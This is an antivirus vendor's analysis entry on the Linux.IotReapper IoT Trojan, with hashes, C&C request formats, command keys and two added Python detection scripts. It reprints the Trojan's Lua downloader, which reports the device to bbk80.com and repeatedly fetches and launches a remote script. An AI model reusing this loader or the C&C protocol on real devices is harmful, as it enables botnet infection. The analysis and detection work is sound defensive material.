Virus library

Analyzing the techniques used by attackers lets us predict the direction in which they are likely to develop, so that we can defend more effectively against the threats we may face in the future. You can also learn how malicious programs operate on an infected system and how to counter them.

Linux.IotReapper in virus library:

SHA1:

  • cd078ef54430c9ef9aa24dfbb7c89456f13e86f6
  • 8f40a00effdc150d15f7a49ce7c72efc5fc364d9

A Trojan that infects IoT Linux devices. It is a modified version of Linux.Mirai.

Instead of brute-forcing logins and passwords to compromise devices, Linux.IotReapper launches exploits (ten at the time of analysis) and checks the result of their execution. If a device is vulnerable, it sends the following structure to its command and control (C&C) server in a GET request:

struct
{
  char host[40];
  char port[10];
  char user[30];
  char password[40];
  char gw_name[30];
  char device_id[30];   /* unique identifier of the infected device */
} DeviceInfo;

where device_id is a unique identifier of the infected device.

Periodically, it sends to the C&C servers the following requests:

/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish

where the value of the act parameter is the exit code of the system call, or finish if no files have been launched.

The Trojan obtains commands from the C&C server in the JSON format. It processes the following keys:

key       value
state     0 or 1
code      run: download and run; down: only download
ip        source for downloading
name      name of the file saved to the /tmp/ folder
md5       its md5
port      http port
path      url to a file
runtype
runport
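To turn a captured command of this shape into hunting indicators (the file to look for under /tmp/, its hash, the download source), here is an added Python example; it is neither Dr.Web's code nor the Trojan's. It uses the key names from the table above, checks that the values are the ones the table allows, and derives the download URL and the dropped file path. The sample command is constructed with placeholder values, and the way ip, port and path combine into a URL is an assumption, since the description only says that path is the url to a file.

```python
import json
import re

# Command keys as listed in the description; the run/down meanings come from the table.
VALID_CODES = {"run": "download and run", "down": "download only"}
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample command (placeholder values, not observed C&C traffic).
SAMPLE_COMMAND = json.dumps({
    "state": 1,
    "code": "run",
    "ip": "198.51.100.7",
    "port": "8080",
    "path": "/payload/x.bin",
    "name": "x.bin",
    "md5": "D41D8CD98F00B204E9800998ECF8427E",
    "runtype": "0",
    "runport": "3000",
})


def build_download_url(ip, port, path):
    """Assumption: 'path' is either a full URL or a path served from ip:port."""
    if path.startswith(("http://", "https://")):
        return path
    if not path.startswith("/"):
        path = "/" + path
    return "http://%s:%s%s" % (ip, port, path)


def extract_iocs(raw):
    """Parse one JSON command and return indicators plus any schema problems."""
    cmd = json.loads(raw)
    problems = []

    if cmd.get("state") not in (0, 1):
        problems.append("state is not 0 or 1")

    code = cmd.get("code")
    if code not in VALID_CODES:
        problems.append("unknown code %r" % (code,))

    md5 = str(cmd.get("md5", "")).lower()
    if not MD5_RE.match(md5):
        problems.append("md5 is not a 32-hex-digit string")

    name = str(cmd.get("name", ""))
    # The file lands in /tmp/; a name with a slash or '..' would not be a plain file name there.
    if not name or "/" in name or ".." in name:
        problems.append("name is empty or not a plain file name")

    return {
        "action": VALID_CODES.get(code, "unknown"),
        "download_url": build_download_url(str(cmd.get("ip", "")),
                                           str(cmd.get("port", "")),
                                           str(cmd.get("path", ""))),
        "dropped_file": "/tmp/" + name,
        "md5": md5,
        "run_type": cmd.get("runtype"),
        "run_port": cmd.get("runport"),
        "problems": problems,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_COMMAND).items():
        print("%-14s %s" % (key, value))
```

The problems list is deliberately advisory rather than fatal: a command that deviates from the documented schema is still worth recording, and the deviation itself is a useful observation when tracking changes to the family.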

The Trojan downloads from the remote server a Lua interpreter module for the ARM and MIPS architectures. The module contains the following Lua code:

local sock = require("socket")
local http = require("socket.http")
local ltn12 = require("ltn12")

-- URL of the script to poll (host masked with *** in the published listing)
local lua_url = "***http://***.com:8080/run.lua"
-- reporting endpoint that receives the device's MAC address and platform
local tj_url = "http://bbk80.com/api/api.php"

-- DEVICE_MAC and VERSION are globals not defined in this excerpt
local request_body = "macaddress=" .. DEVICE_MAC .. "&device=TP-Link775" .. "&type=armv5le&version=" .. VERSION
local if_modified_since = nil;

-- adds a get() helper to socket.http that remembers the Date header of the last
-- successful download and replays it as If-Modified-Since, so an unchanged
-- script is answered with 304 instead of being downloaded again
function http.get(u)
    local t = {}
    local headers = {
    }

    -- nil ~= "" is true, so this branch is always taken; a nil value simply omits the header
    if if_modified_since ~= "" then
        headers = {
            ["If-Modified-Since"] = if_modified_since
        }
    end
    local r, c, h = http.request{
        headers = headers,
        url = u,
        sink = ltn12.sink.table(t)
    }

    if c == 200 then
        if_modified_since = h["date"]
    end
    return r, c, h, table.concat(t)
end

-- report the device, fetch the script once, then repeat every five minutes
http.request(tj_url,request_body)
local r,code,header,body=http.get(lua_url)
while true do
    if code == 200 then
        attack(body)   -- attack() is not part of this excerpt; it launches the downloaded script
        print("Download Succeed")
    elseif code == 304 then
        --print("Download Not Modified")
    else
        print("Download Failed:" .. code)
    end
    sock.sleep(5 * 60)
    r,code,header,body=http.get(lua_url)
    http.request(tj_url,request_body)
    collectgarbage("collect")
end
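As an added example that is not part of Dr.Web's write-up, the following Python scans a proxy log for the two network behaviours described on this page: the /rx/hx.php check-in with its doubled && and act parameter, and the Lua module's polling of run.lua every five minutes alongside the report POST to bbk80.com/api/api.php. The log lines, their format, the client addresses and the script host are all constructed for the example; only the URL shapes come from the description above.

```python
import re
from datetime import datetime
from statistics import median

# Constructed proxy log (not captured traffic): "<ISO time> <client> <method> <url>".
SAMPLE_LOG = """\
2017-10-30T10:00:00Z 10.0.0.5 GET http://198.51.100.9/rx/hx.php?mac=52-54-00-12-34-56&&port=3000&type=etag&ver=1.07&act=finish
2017-10-30T10:00:01Z 10.0.0.5 POST http://bbk80.com/api/api.php
2017-10-30T10:00:01Z 10.0.0.5 GET http://203.0.113.4:8080/run.lua
2017-10-30T10:05:01Z 10.0.0.5 GET http://203.0.113.4:8080/run.lua
2017-10-30T10:05:01Z 10.0.0.5 POST http://bbk80.com/api/api.php
2017-10-30T10:10:02Z 10.0.0.5 GET http://203.0.113.4:8080/run.lua
2017-10-30T10:03:00Z 10.0.0.8 GET http://example.com/index.html
2017-10-30T10:03:05Z 10.0.0.8 GET http://example.com/run.lua
"""

LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")

# Check-in URL from the description: note the doubled '&&' before port, a cheap
# but distinctive quirk, and the act value (exit code or "finish").
HX_BEACON = re.compile(
    r"/rx/hx\.php\?mac=(?P<mac>[0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})"
    r"&&port=(?P<port>\d+)&type=(?P<type>\w+)&ver=(?P<ver>[\d.]+)&act=(?P<act>\w+)"
)
# The Lua loader fetches <host>/run.lua; the host itself is masked in the sample.
LUA_LOADER = re.compile(r"^http://[^/]+/run\.lua$")
# The loader sleeps 5 * 60 seconds between polls.
POLL_PERIOD = 300
POLL_TOLERANCE = 30


def scan_log(text):
    """Return a list of findings for beacon, report and poll behaviour per client."""
    findings = []
    polls = {}  # (client, url) -> list of timestamps

    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts_text, client, method, url = m.groups()
        ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")

        b = HX_BEACON.search(url)
        if b:
            findings.append({"kind": "hx_beacon", "client": client,
                             "mac": b["mac"], "ver": b["ver"], "act": b["act"]})

        if method == "POST" and "bbk80.com" in url and url.endswith("/api/api.php"):
            findings.append({"kind": "tj_report", "client": client, "url": url})

        if method == "GET" and LUA_LOADER.match(url):
            polls.setdefault((client, url), []).append(ts)

    # A single run.lua fetch is weak evidence; a steady ~300 s cadence is the signal.
    for (client, url), times in polls.items():
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        periodic = len(gaps) >= 2 and abs(median(gaps) - POLL_PERIOD) <= POLL_TOLERANCE
        findings.append({"kind": "lua_poll", "client": client, "url": url,
                         "hits": len(times), "periodic": periodic})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Periodicity is judged on the median gap rather than the mean so that one missed poll (a reboot, a dropped connection) does not hide an otherwise regular cadence; with only two fetches there is not enough evidence, and the finding is reported with periodic set to False.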

At the time of analysis, the script that this module downloads and launches looks like this:

print("Just Test")

The Trojan's functionality allows it to receive links, download a file from them and launch it. However, attempts to obtain active links were unsuccessful during the research of the sample.
